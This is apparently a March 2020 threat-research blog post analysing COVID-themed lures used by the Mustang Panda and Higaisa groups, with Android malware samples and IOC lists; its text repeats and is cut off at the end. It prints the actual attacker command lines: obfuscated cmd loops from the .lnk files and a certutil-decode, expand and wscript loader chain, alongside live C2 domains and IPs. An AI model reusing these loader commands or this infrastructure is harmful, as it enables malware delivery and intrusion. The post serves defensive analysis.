Blog

COVID-19 Themes Are Being Utilized by Threat Actors of Varying Sophistication

Threat actors are utilizing the global spread of COVID-19 (Coronavirus) to conduct malicious activity. As the world responds to this threat in various ways, actors are attempting to use the chaos to their advantage.

Anomali Threat Research
March 23, 2020
Table of contents
<p><em>Authored by: Gage Mele, Parthiban R., and Tara Gould</em></p><h3>The Tactics, Techniques and Procedures (TTPs) Are Known but the Content Is Coronavirus-Themed</h3><h2>Overview</h2><p>Threat actors are utilizing the global spread of COVID-19 (Coronavirus) to conduct malicious activity. As the world responds to this threat in various ways, actors are attempting to use the chaos to their advantage. COVID-19 is being weaponized for scare tactics by threat actors for conducting malicious activity utilizing different Tactics, Techniques, and Procedures (TTPs). While the majority of observations made by Anomali Threat Research (ATR) are commodity (purchasable and widely distributed) campaigns and malware. ATR identified that the Higaisa and Mustang Panda Advanced Persistent Threat (APT) groups have been utilizing Coronavirus-themed lures in their campaigns.</p><p>In addition to machine-targeted campaigns, ATR also identified COVID-19-themes targeting Android mobile devices. One of the samples is utilizing a fully functional Coronavirus infection-tracking application while the SpyNote Remote Access Trojan (RAT) runs in the background. Another is a phishing campaign that uses a fake Adobe Flash update and COVID-19 related URLs to install the Cerberus banking trojan. While some of these malware are commodity and may be more obvious malicious attempts, actors will likely continue to abuse these themes to install various malware families, some of which will be discussed below.</p><h2>Details</h2><p>The current activity being reported on open sources consists of threat actors using COVID-19 as part of phishing campaigns, both in email subject and content as well as attachments.<sup>[1]</sup> These kind of virus-themed campaigns began almost immediately after the 41 cases of COVID-19 were reported on by the World Health Organization on December 31, 2019.<sup>[2]</sup> By January and February 2020, Coronavirus-themed lures were widespread with assistance from the Emotet botnet.<sup>[3]</sup> The malware used in these campaigns can vary because many distribution methods are offered for purchase and utilized by numerous actors, however, there have been some instances of Advanced Persistent Threat (APT) actors attempting to capitalize on the COVID-19 outbreak.</p><p>In mid-March 2020, Check Point Research published their findings regarding a campaign targeting the Mongolian public sector utilizing Coronavirus-themed lure documents.<sup>[4]</sup> This RTF activity also coincides with RTF activity identified by ATR.<sup>[5]</sup> APTs frequently use relevant themes as lures, and ATR has also identified such groups attempting to capitalize on Coronavirus-related events.</p><h2>APT Activity</h2><p>ATR observed a campaign beginning in late February through mid-March 2020, that we believe is being conducted by the China-based APT group, Mustang Panda. The group is utilizing decoy documents related to COVID-19 to target Taiwan and Vietnam. Mustang Panda is continuing to use Cobalt Strike and PlugX RAT as their final payloads. This activity aligns with Mustang Panda TTPs previously identified by ATR.<sup>[6]</sup></p><h2>Lure Documents</h2><p><strong>Document title</strong> - 02-21-1.docx</p><p><strong>Hash</strong> - 6d994c64c17ce50cbb333c8b4bcbd8e0</p><p style="text-align: center;"><em><strong><img alt="Chen Chien-jen Facebook Discussion" src="https://cdn.filestackcontent.com/uygM4gr8S5SXzbVienvd"/><br/> Figure 1</strong> - Chen Chien-jen Facebook Discussion</em></p><p>The document file above is describing a post on Facebook written by Chen Chien-jen, current Vice President of the Republic of China and former Vice President of Taiwanese research institution, Academia Sinica. The post discusses community transition [of Coronavirus] and the United States’ (US) Centers for Disease Control (CDC) listing of countries for it, specifically Taiwan. Taiwan’s Foreign Ministry subsequently demanded removal from said listing.</p><p><strong>Document title</strong> - 03-01-1.docx</p><p><strong>Hash</strong> - 7f0a1bdde14ea1f3085b43bdadcfb146</p><p style="text-align: center;"><em><strong><img alt="COVID-19 Questions" src="https://cdn.filestackcontent.com/F3mexsJeRa6uoPeqwMFH"/><br/> Figure 2</strong> - COVID-19 Questions</em></p><p>Figure 2 contains text that was translated to English, likely from Chinese due to Mustang Panda being China-based, because of the spelling and grammar errors that would be uncommon for a native speaker. The text poses questions about neutralizing COVID-19 with varying levels of sophistication.</p><p><strong>Document title</strong> - Chi Thi cua thu tuong nguyen xuan phuc.doc</p><p><strong>Hash</strong> - 13d61974d2db537bdb0504cfc53b74a7</p><p style="text-align: center;"><em><strong><img alt="Vietnamese Government Meeting Article from March 3, 2020" src="https://cdn.filestackcontent.com/RLzDfxvnTBOFLYCNC7B4"/><br/> Figure 3</strong> - Vietnamese Government Meeting Article from March 3, 2020</em></p><p>The document in Figure 3 is an article discussing a meeting held by Vietnamese Prime Minister Nguyen Xuan Phuc that was held on March 3, 2020. Other government officials attending the meeting spoke of unity in these times and how approximately 3,000 have been placed in isolation and are under the care of the army. Other topics include overall Coronavirus prevention measures and updates on travel restrictions. The article is publicly available at www.cantho.gov[.]vn, and was likely taken by Mustang Panda from this source as observed by ATR in previous campaigns conducted by the group.</p><h2>Technical Analysis</h2><p>The above mentioned three RAR (compressed files) files each contain a Windows Shortcut (.lnk) file. The .lnk files being utilized by Mustang Panda typically contain an embedded HTA file with VBscript, once executed, will drop and open the decoy document while the malicious activity of the payload runs in the background. ATR observed PlugX and Cobalt Strike being delivered as the primary payloads throughout the campaign.</p><h3>.lnk files</h3><p style="text-align: center;"><em><strong>Table 1</strong> - .lnk file metadata</em></p><table class="table table-striped" style="table-layout: fixed;"><tbody><tr><th style="word-wrap: break-word;">FileMD5</th><th style="word-wrap: break-word;">LinkModifiedDate</th><th style="word-wrap: break-word;">FileSize</th><th style="word-wrap: break-word;">NameString</th><th style="word-wrap: break-word;">CommandLineArgs</th><th style="word-wrap: break-word;">NetBios Name</th><th style="word-wrap: break-word;">MAC Address</th></tr><tr><td style="word-wrap: break-word;">FC00964131A8C9407BA77484E724FC9D</td><td style="word-wrap: break-word;">7/14/2009 1:14</td><td style="word-wrap: break-word;">301568</td><td style="word-wrap: break-word;">02-21-1.lnk</td><td style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%x-21-1.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">win-67od36i8f4c</td><td style="word-wrap: break-word;">00:0C:29:50:2D:E6</td></tr><tr><td style="word-wrap: break-word;">0F794D6C6646A260558E9D638AE060C9</td><td style="word-wrap: break-word;">7/14/2009 1:14</td><td style="word-wrap: break-word;">301568</td><td style="word-wrap: break-word;">03-01-1.lnk</td><td style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%x-01-1.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">cia-at28--planc</td><td style="word-wrap: break-word;">00:0C:29:50:2D:E6</td></tr><tr><td style="word-wrap: break-word;">A4B7FE08900074B6A103D2CF36730421</td><td style="word-wrap: break-word;">11/21/2010 3:24</td><td style="word-wrap: break-word;">302592</td><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.lnk</td><td style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">win-gnhs1vcenrt</td><td style="word-wrap: break-word;">AA:50:18:7E:EB:82</td></tr></tbody></table><h3>Payload Analysis</h3><p>Mustang Panda has used the well known adversary emulation tool called Cobalt Strike as the final payload for the following samples <strong>02-21-1.lnk</strong> and <strong>03-01-1.lnk</strong>. The group has utilized the malleable Command and Control (C2) feature in Cobalt Strike tool to mask the malicious traffic behind a legitimate DNS request to code.jquery.com. The samples mentioned above use 123.51.185[.]75 as their final C2.</p><p>Two notable changes from Mustang Panda previous campaigns identified by ATR are:</p><ul><li>Change in directory <strong>C:UsersPublicMusic</strong> where the payload is dropped</li><li>Usage of the legitimate executable <strong>tencentsoso.exe</strong> that is used for DLL side loading</li></ul><p>The sample <strong>Chi Thi cua thu tuong nguyen xuan phuc.lnk</strong> uses <strong>PlugX</strong> as its final payload. Once executed it drops three files in the directory<strong> C:ProgramDataMicrosoft Malware Protectionydy</strong>. The <strong>unescapp.exe</strong> is a legitimate executable that is signed by “ESET, spol. s r.o.” and it is being abused for DLL hijacking technique to execute http_dll.dll which decodes and loads the malicious payload http_dll.dat. Upon execution of the payload it reaches out to the C2 domain vietnam[.]zing[.]photos and it resolves to 104.160.44[.]85.</p><p style="text-align: center;"><em><strong><img alt="Dropped File Location" src="https://cdn.filestackcontent.com/RXEMSlWiTSiqbrIp0Rgd"/><br/> Figure 4</strong> - Dropped File Location</em></p><p>ATR attributes this activity to Mustang Panda based on the TTPs, targeted countries, and usage of malware families that all have been previously attributed to the group.<sup>[7]</sup></p><h2>Higaisa Activity</h2><p>Covid.pdf.lnk - 21a51a834372ab11fba72fb865d6830e</p><p>On March 15, 2020, ATR identified a malicious .lnk file that utilizes an infection chain similar to other known APT groups. This campaign was found to use C2 infrastructure that overlaps with the Korea-based APT group, Higaisia. The lure document, dropped by the .lnk file, was downloaded from the World Health Organization website, and is likely being used to target English-speaking individuals and entities.</p><p>The .lnk uses a multi stage process to deliver a decory PDF document (Figure 5) and the final payload PlugX and it reaches out to C2 motivation[.]neighboring[.]site and it resolves to 69.172.75[.]223. PlugX is a Remote Access Trojan (RAT) that is commonly used by China-based threat actors.</p><p style="text-align: center;"><em><strong><img alt="World Health Organization Situation Report" src="https://cdn.filestackcontent.com/s7AuHINcQlisMpNyC09n"/><br/> Figure 5</strong> - World Health Organization Situation Report</em></p><h3>Technical Analysis</h3><p>The .lnk file contains an embedded blob of base64 encoded content. Inspecting the .lnk metadata, it appears that the actor has modified them, for example the following fields have been tampered, creation time, Machine ID and MAC address as shown in Figure 6.</p><p style="text-align: center;"><em><strong><img alt=".lnk Metadata" src="https://cdn.filestackcontent.com/eqfWi7L2SbiWLTAI3p0H"/><br/> Figure 6</strong> - .lnk Metadata</em></p><p>Upon execution of the .lnk file, the following commands were run in the background,</p><pre> /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\g4ZokyumBB2gDn.tmp /y&amp; for /r C:\Windows\System32\ %i in (*ertu*.exe) do copy %i %tmp%\msoia.exe /y&amp; findstr.exe "TVNDRgAAAA" %tmp%\g4ZokyumBB2gDn.tmp&gt;%tmp%\cSi1r0uywDNvDu.tmp&amp;%tmp%\ msoia.exe -decode %tmp%\cSi1r0uywDNvDu.tmp %tmp%\oGhPGUDC03tURV.tmp&amp; expand %tmp%\oGhPGUDC03tURV.tmp -F:* %tmp% &amp; wscript %tmp%\9sOXN6Ltf0afe7.js</pre><p>The file cSi1r0uywDNvDu.tmp is a <strong>Windows cabinet</strong> (.cab) file. The contents of the cabinet file is shown in Figure 7 below.</p><p style="text-align: center;"><em><strong><img alt="Contents of Cabinet File" src="https://cdn.filestackcontent.com/ul1qz0k5TzOkbB9uFgzY"/><br/> Figure 7</strong> - Contents of Cabinet File</em></p><p>The contents of the cabinet file are extracted using built in windows executable file <strong>extract.exe</strong> and they are renamed as shown in Figure 8.</p><p style="text-align: center;"><em><strong><img alt="Renamed Cabinet File Contents" src="https://cdn.filestackcontent.com/lQYd6ZqxQ4OOjClgNMbT"/><br/> Figure 8</strong> - Renamed Cabinet File Contents</em></p><p>The JavaScript, <strong>9sOXN6Ltf0afe7.js</strong>, performs multiple operations like copying and renaming files, and it uses the living off the land technique to execute the VBscript file <strong>WsmPty.xsl</strong> using <strong>cscript.exe</strong>.<sup>[8]</sup> The VBscript is responsible for creating persistence and it executes the further payloads by abusing the legitimate executable <strong>msostyle.exe</strong>. Upon its execution it loads the file <strong>oinfo12.ocx</strong> (.dll) and it further loads and executes <strong>wordcnvpxy.exe</strong> (PlugX). The malware reaches out to the C2 URL motivation[.]neighboring[.]site/01/index.php.</p><p>Figure 9 and 10 below depicts the overlapping evidence, as mentioned above. The C2 IP, 69.172.75[.]223, was previously used by Higaisa and reported on in late February, 2020.<sup>[9]</sup></p><p style="text-align: center;"><em><strong><img alt="Higaisa C2 Overlap" src="https://cdn.filestackcontent.com/ajDr1oOwS5mDVpgKZYTu"/><br/> Figure 9</strong> - Higaisa C2 Overlap</em></p><p style="text-align: center;"><em><strong><img alt="Higaisa Sample Communication to IP" src="https://cdn.filestackcontent.com/2sT6sKDuRiqyJkJYds6e"/><br/> Figure 10</strong> - Higaisa Sample Communication to IP (https://community.riskiq.com/search/69.172.75.223)</em></p><h2>Mobile Malware</h2><p><strong>APK title</strong> - Avist.apk</p><p><strong>Hash</strong> - 107169ae6951a5cba57d2a0cd274e28fadf5c73d73e91a386f15cf4dc35edd38</p><p>This Android application is fully-functional and will update overall COVID-19 statistics as a normal application would. While the user installs the COVID-19 tracking application, the <strong>SpyNote</strong> RAT is downloaded in the background.</p><p style="text-align: center;"><em><strong><img alt="Installation Request" src="https://cdn.filestackcontent.com/8zK9aw3WSwyxiZbM6dT7"/><br/> Figure 11</strong> - Installation Request</em></p><p style="text-align: center;"><em><strong><img alt="Functional COVID-19 Application Appearance" src="https://cdn.filestackcontent.com/ySvXmueQ0SxCgJUPCjpg"/><br/> Figure 12</strong> - Functional COVID-19 Application Appearance</em></p><p><strong>APK title</strong> - UpdateFlashPlayer_11_5_1.apk</p><p><strong>Hash</strong> - F57a44bec2f7af2da443f068edb0a743f9625ac3a9d686393bacb8e72274b5de</p><p>The Android banking Trojan, Cerberus has been utilizing the attention around the Coronavirus outbreak as an opportunity to push their malware. Using various websites including <strong>coronaviruscovid-19-information[.]com</strong> and <strong>covid19-info[.]online</strong> (among others) to trick users into downloading the Cerberus trojan. Navigating to one of these websites prompts the visitor to download Cerberus that masquerades as an Adobe Flash Player update. Once installed, Cerberus’ primary objective is to steal financial information, however, the trojan can be manipulated depending on the actor’s objective.</p><p style="text-align: center;"><em><strong><img alt="Coronavirus-related URL Prompting for Adobe Flash Player Update (Cerberus)" src="https://cdn.filestackcontent.com/WN4drmBUReyGZH3kmHvI"/><br/> Figure 13 </strong>- Coronavirus-related URL Prompting for Adobe Flash Player Update (Cerberus)</em></p><h2>IOCs</h2><h3>Domains / IPs/ URLs</h3><p>104.160.44[.]85<br/> 123.51.185[.]75<br/> 69.172.75[.]223<br/> vietnam[.]zing[.]photos<br/> motivation[.]neighboring[.]site<br/> http://vietnam.zing.photos:443/update?wd=df07d8ba<br/> motivation[.]neighboring[.]site/01/index.php</p><h3>Hashes</h3><table class="table table-striped" style="table-layout: fixed;"><tbody><tr><th style="word-wrap: break-word;">File Name</th><th style="word-wrap: break-word;">MD5 Hash</th></tr><tr><td style="word-wrap: break-word;">Http_dll.dat</td><td style="word-wrap: break-word;">0DE06292C0010A4E8F453806373E68D4</td></tr><tr><td style="word-wrap: break-word;">http_dll.dll</td><td style="word-wrap: break-word;">415591D11CF6AEB940AC92C904A1F26A</td></tr><tr><td style="word-wrap: break-word;">02-21-1.rar</td><td style="word-wrap: break-word;">A0D41E87BF259CE882C4977D79FA806A</td></tr><tr><td style="word-wrap: break-word;">03-01-1.rar</td><td style="word-wrap: break-word;">24AF885E38D7CA7912824F2470E5E6BE</td></tr><tr><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.rar</td><td style="word-wrap: break-word;">60C89B54029442C5E131F01FF08F84C9</td></tr><tr><td style="word-wrap: break-word;">02-21-1.lnk</td><td style="word-wrap: break-word;">FC00964131A8C9407BA77484E724FC9D</td></tr><tr><td style="word-wrap: break-word;">03-01-1.lnk</td><td style="word-wrap: break-word;">0F794D6C6646A260558E9D638AE060C9</td></tr><tr><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.lnk</td><td style="word-wrap: break-word;">A4B7FE08900074B6A103D2CF36730421</td></tr><tr><td style="word-wrap: break-word;">3UDBUTNY7YstRc.tmp</td><td style="word-wrap: break-word;">83D04F21515C7E6316F9CD0BB393A118</td></tr><tr><td style="word-wrap: break-word;">486AULMsOPmf6W.tmp</td><td style="word-wrap: break-word;">371E896D818784934BD1456296B99CBE</td></tr><tr><td style="word-wrap: break-word;">9sOXN6Ltf0afe7.js</td><td style="word-wrap: break-word;">4F8FF5E70647DBC5D91326346C393729</td></tr><tr><td style="word-wrap: break-word;">cSi1r0uywDNvDu.tmp</td><td style="word-wrap: break-word;">EEFEB76D26338E09958AAE5D81479178</td></tr><tr><td style="word-wrap: break-word;">MiZl5xsDRylf0W.tmp</td><td style="word-wrap: break-word;">C1D8966FA1BD7AEE41B2C4AD731407D3</td></tr><tr><td style="word-wrap: break-word;">oGhPGUDC03tURV.tmp</td><td style="word-wrap: break-word;">37f78b1ad43959a788162f560bdc9c79</td></tr><tr><td style="word-wrap: break-word;">Covid.pdf.lnk</td><td style="word-wrap: break-word;">21a51a834372ab11fba72fb865d6830e</td></tr><tr><td style="word-wrap: break-word;">Covid.zip</td><td style="word-wrap: break-word;">a89607c9515caeb1d784439a1ee1f208</td></tr><tr><td style="word-wrap: break-word;">Wordcnvpxy.exe</td><td style="word-wrap: break-word;">fd648c3b7495abbe86b850587e2e5431</td></tr><tr><td style="word-wrap: break-word;">20200308-sitrep-48-covid-19.pdf</td><td style="word-wrap: break-word;">FAF5EF01F4A9BF2ABA7EDE67DCC5A2D4</td></tr><tr><td style="word-wrap: break-word;">covid-19.jar</td><td style="word-wrap: break-word;">13c26ea1dc3a2fee403a7913f6f66c03</td></tr><tr><td style="word-wrap: break-word;">covid-precautions .exe</td><td style="word-wrap: break-word;">45a0797b74db206615e92050ecf7b31e</td></tr><tr><td style="word-wrap: break-word;">Basic_protection.pdf</td><td style="word-wrap: break-word;">c9184430cfd1e72ff9213e67f73b06c2</td></tr><tr><td style="word-wrap: break-word;">file2.exe</td><td style="word-wrap: break-word;">ec517204fbcf7a980d137b116afa946d</td></tr><tr><td style="word-wrap: break-word;">CoronaVirus_Video-11032020BRTORS2VYLLOC8NTR7DA79YIM6.vbs</td><td style="word-wrap: break-word;">0a648ccc4c7ce4f4315adc22878c49c2</td></tr><tr><td style="word-wrap: break-word;"><a href="https://www.virustotal.com/gui/search/name:%22Official%20communication%20by%20Ferribiella%20Italy-CORONAVIRUS%2011.03.2020_EN.exe%22" target="_blank">Official communication by Ferribiella Italy-CORONAVIRUS 11.03.2020_EN.exe</a></td><td style="word-wrap: break-word;">405f2f6fa2077552fa848bb740bd5ffd</td></tr><tr><td style="word-wrap: break-word;">CORONA TREATMENT.doc</td><td style="word-wrap: break-word;">4efc395c3cd44646e2bfb9680932b811</td></tr><tr><td style="word-wrap: break-word;">logday.dll</td><td style="word-wrap: break-word;">4efc395c3cd44646e2bfb9680932b811</td></tr><tr><td style="word-wrap: break-word;">Coronavirus_disease_COVID-19__773315073441331.doc</td><td style="word-wrap: break-word;">8ff6621ecf76a5632dc7ca459f3e5a89</td></tr><tr><td style="word-wrap: break-word;">卫生部指令.docx</td><td style="word-wrap: break-word;">3519b57181da2548b566d3c49f2bae18</td></tr><tr><td style="word-wrap: break-word;">武汉旅行信息收集申请表.xlsm</td><td style="word-wrap: break-word;">b08dc707dcbc1604cfd73b97dc91a44c</td></tr><tr><td style="word-wrap: break-word;"><a href="https://www.virustotal.com/gui/search/name%253A%2522POEA%2520HEALTH%2520ADVISORY%2520re-2020%2520Novel%2520Corona%2520Virus.pdf.exe%2522" target="_blank">POEA HEALTH ADVISORY re-2020 Novel Corona Virus.pdf.exe</a></td><td style="word-wrap: break-word;">f59c558d9b33a25ac8b32f495f6fd035</td></tr><tr><td style="word-wrap: break-word;">COVID-19_Tracker.exe</td><td style="word-wrap: break-word;">595149b8dcab35fde269a86d0bd74756</td></tr><tr><td style="word-wrap: break-word;">Avist.apk</td><td style="word-wrap: break-word;">660159f431b5f8ec8c4fed0298168d1a</td></tr><tr><td style="word-wrap: break-word;">https://covid19-info[.]online/UpdateFlashPlayer_11_5_1.apk</td><td style="word-wrap: break-word;">3382348f9618058dde3aacffcb34982e</td></tr><tr><td style="word-wrap: break-word;">Corona Virus Advice For Public____________________pdf.exe</td><td style="word-wrap: break-word;">8a228725fe66ab52a62eb44687ad0680</td></tr><tr><td style="word-wrap: break-word;">St John of God Health Care (COVID-19) Notice.pdf</td><td style="word-wrap: break-word;">19fda4048f29fbf6e0c9e0a4b8bd0946</td></tr><tr><td style="word-wrap: break-word;">Download PDF File - Coronavirus Disease 2019 Controls scr</td><td style="word-wrap: break-word;">e7fab8e420dd74157bc4dcc5ab396dc8</td></tr></tbody></table><h3>Other Coronavirus-themed Hashes</h3><p>a70a55e62c963d58817e5087fe9fe7e3<br/> 3a2438dd2c13c48ce7867a9ebefc9e5a<br/> 9ca4f31fb9707adc43d9b7e630b2cf26<br/> fb525e13cb82ea91b9d7576e3078674c<br/> dc0d41af833054bc8fd6fa3894fed188<br/> a61ab959038859f3a185ab688271894c<br/> e53ce7efb47a1ea67fa8df6621f2294b<br/> 98051bcea1ec152a80c6acaa4e46a069<br/> f908dc8852f659dd43a8dc25f3d74c2e<br/> 62a5677e30343bc14078b97148d67036<br/> 71b3db4cf0a03c8650c140e023a06793<br/> bb512de5decd3a2428407660ff57678c<br/> 2e1ea39e25dde32a9a36078ac59db814<br/> 1e85dd017cd9f9d856e5943e8824009e<br/> 3bc7a303e48a39b0582cb6aa888b6f49<br/> e5ce3207e8e7019bd0f0963956267128<br/> af5ce343c7e4c64319c658c87b85f9a6<br/> 002e017b97eda9eaae523a0a9a518d84<br/> 26b95d45df0744d11cf1d91f5629ba87<br/> 2d79034d853b32423b1e06c3f27bfc61<br/> 0fb5cc4ac25234239d291e40b47c98d3<br/> fc20439e60e168f7bc5b1afd0a31e015<br/> b0ef3735aaf9ea9de69848d7131c6942<br/> a0045f26111de6b079dc0bffd5aef4e6<br/> 4b30f50d1a8f8c12bca8fd436c1469fd<br/> b3f496ce13ff6fed1048399e1fc89403<br/> 7b4a3d320a888059a6328a61f21d9095<br/> 8bd336d4dcdc4f45a9a5c72d5791f6a8<br/> 55879cddb0e18c34aaa992d24690e0e7<br/> 320cde0e1b34e03f0ea393a0483b6798</p><h2>Conclusion</h2><p>Threat actors are opportunistic and will continuously update themes of their malicious campaigns in whichever way they believe will increase the chances of completing an objective. Commodity malware will change to whatever themes are relevant to the current period in time. As discussed in this report, threat actors are still utilizing TTPs known about and discussed in the security community, it is only the content of social engineering documents that has changed.</p><p>The Coronavirus effect is world-wide and increasingly affecting individuals in real life and online. We hope everyone is doing their best to stay safe during these times. Additional information on the Coronavirus can be found on the following websites:</p><ul><li><a href="https://www.cdc.gov/coronavirus/2019-ncov/index.html" target="_blank">https://www.cdc.gov/coronavirus/2019-ncov/index.html</a></li><li><a href="https://www.gov.uk/guidance/coronavirus-covid-19-information-for-the-public" target="_blank">https://www.gov.uk/guidance/coronavirus-covid-19-information-for-the-public</a></li></ul><h2>Endnotes</h2><p><sup>[1]</sup> CISA, “Defending Against COVID-19 Cyber Scams,” US-CERT, accessed March 17, 2020, published March 6, 2020, <a href="https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams" target="_blank">https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams</a>; Insikt Group, “Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide,” Recorded Future, accessed March 17, 2020, published March 12, 2020,  <a href="https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf" target="_blank">https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf</a>.</p><p><sup>[2]</sup> “Rolling updates on Coronavirus disease (COVID-19),” World Health Organization, accessed March 17, 2020, published March 18, 2020, <a href="https://www.who.int/emergencies/diseases/novel-coronavirus-2019/events-as-they-happen" target="_blank">https://www.who.int/emergencies/diseases/novel-coronavirus-2019/events-as-they-happen</a>.</p><p><sup>[3]</sup> Nick Biasini and Edmund Brumghin, “Threat actors attempt to capitalize on coronavirus outbreak,” Cisco Talos Blog, accessed March 17, 2020, published February 13, 2020, <a href="https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html" target="_blank">https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html</a>; “January 2020’s Most Wanted Malware: Coronavirus-themed spam spread malicious Emotet malware,” Check Point Blog, accessed March 17, 2020, published February 13, 2020, <a href="https://blog.checkpoint.com/2020/02/13/january-2020s-most-wanted-malware-coronavirus-themed-spam-spreads-malicious-emotet-malware/" target="_blank">https://blog.checkpoint.com/2020/02/13/january-2020s-most-wanted-malware-coronavirus-themed-spam-spreads-malicious-emotet-malware/</a>.</p><p><sup>[4]</sup> “January 2020’s Most Wanted Malware: Coronavirus-themed spam spread malicious Emotet malware,” Check Point Blog.</p><p><sup>[5]</sup> Anomali Threat Research Team, “Multiple Chinese Threat Groups Exploiting CVE-2018-0798 Equation Editor Vulnerability Since Late 2018,” Anomali Blog, accessed March 17, 2020, published July 3, 2019, <a href="https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018">https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018</a>.</p><p><sup>[6]</sup> Anomali Threat Research Team, “China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations,” Anomali Blog, accessed March 17, 2020, published October 7, 2019, <a href="https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations">https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations</a>.</p><p><sup>[7]</sup> Anomali Threat Research Team, “China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations,” Anomali Blog.</p><p><sup>[8]</sup> “/ winrm.vbs,” Living Off The Land Binaries and Scripts (and also Libraries), accessed March 20, 2020, <a href="https://lolbas-project.github.io/lolbas/Scripts/Winrm/" target="_blank">https://lolbas-project.github.io/lolbas/Scripts/Winrm/</a>.</p><p><sup>[9]</sup> “Higaisa” Recent Attack Activity Report,” Tencent Security Threat Intelligence Center, accessed March 18, 2020, published February 27, 2020, <a href="https://s.tencent.com/research/report/895.html" target="_blank">https://s.tencent.com/research/report/895.html</a>.</p>
Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.

Propel your mission with amplified visibility, analytics, and AI.

Learn how Anomali can help you cost-effectively improve your security posture.

March 23, 2020
-
Anomali Threat Research
,

COVID-19 Themes Are Being Utilized by Threat Actors of Varying Sophistication

<p><em>Authored by: Gage Mele, Parthiban R., and Tara Gould</em></p><h3>The Tactics, Techniques and Procedures (TTPs) Are Known but the Content Is Coronavirus-Themed</h3><h2>Overview</h2><p>Threat actors are utilizing the global spread of COVID-19 (Coronavirus) to conduct malicious activity. As the world responds to this threat in various ways, actors are attempting to use the chaos to their advantage. COVID-19 is being weaponized for scare tactics by threat actors for conducting malicious activity utilizing different Tactics, Techniques, and Procedures (TTPs). While the majority of observations made by Anomali Threat Research (ATR) are commodity (purchasable and widely distributed) campaigns and malware. ATR identified that the Higaisa and Mustang Panda Advanced Persistent Threat (APT) groups have been utilizing Coronavirus-themed lures in their campaigns.</p><p>In addition to machine-targeted campaigns, ATR also identified COVID-19-themes targeting Android mobile devices. One of the samples is utilizing a fully functional Coronavirus infection-tracking application while the SpyNote Remote Access Trojan (RAT) runs in the background. Another is a phishing campaign that uses a fake Adobe Flash update and COVID-19 related URLs to install the Cerberus banking trojan. While some of these malware are commodity and may be more obvious malicious attempts, actors will likely continue to abuse these themes to install various malware families, some of which will be discussed below.</p><h2>Details</h2><p>The current activity being reported on open sources consists of threat actors using COVID-19 as part of phishing campaigns, both in email subject and content as well as attachments.<sup>[1]</sup> These kind of virus-themed campaigns began almost immediately after the 41 cases of COVID-19 were reported on by the World Health Organization on December 31, 2019.<sup>[2]</sup> By January and February 2020, Coronavirus-themed lures were widespread with assistance from the Emotet botnet.<sup>[3]</sup> The malware used in these campaigns can vary because many distribution methods are offered for purchase and utilized by numerous actors, however, there have been some instances of Advanced Persistent Threat (APT) actors attempting to capitalize on the COVID-19 outbreak.</p><p>In mid-March 2020, Check Point Research published their findings regarding a campaign targeting the Mongolian public sector utilizing Coronavirus-themed lure documents.<sup>[4]</sup> This RTF activity also coincides with RTF activity identified by ATR.<sup>[5]</sup> APTs frequently use relevant themes as lures, and ATR has also identified such groups attempting to capitalize on Coronavirus-related events.</p><h2>APT Activity</h2><p>ATR observed a campaign beginning in late February through mid-March 2020, that we believe is being conducted by the China-based APT group, Mustang Panda. The group is utilizing decoy documents related to COVID-19 to target Taiwan and Vietnam. Mustang Panda is continuing to use Cobalt Strike and PlugX RAT as their final payloads. This activity aligns with Mustang Panda TTPs previously identified by ATR.<sup>[6]</sup></p><h2>Lure Documents</h2><p><strong>Document title</strong> - 02-21-1.docx</p><p><strong>Hash</strong> - 6d994c64c17ce50cbb333c8b4bcbd8e0</p><p style="text-align: center;"><em><strong><img alt="Chen Chien-jen Facebook Discussion" src="https://cdn.filestackcontent.com/uygM4gr8S5SXzbVienvd"/><br/> Figure 1</strong> - Chen Chien-jen Facebook Discussion</em></p><p>The document file above is describing a post on Facebook written by Chen Chien-jen, current Vice President of the Republic of China and former Vice President of Taiwanese research institution, Academia Sinica. The post discusses community transition [of Coronavirus] and the United States’ (US) Centers for Disease Control (CDC) listing of countries for it, specifically Taiwan. Taiwan’s Foreign Ministry subsequently demanded removal from said listing.</p><p><strong>Document title</strong> - 03-01-1.docx</p><p><strong>Hash</strong> - 7f0a1bdde14ea1f3085b43bdadcfb146</p><p style="text-align: center;"><em><strong><img alt="COVID-19 Questions" src="https://cdn.filestackcontent.com/F3mexsJeRa6uoPeqwMFH"/><br/> Figure 2</strong> - COVID-19 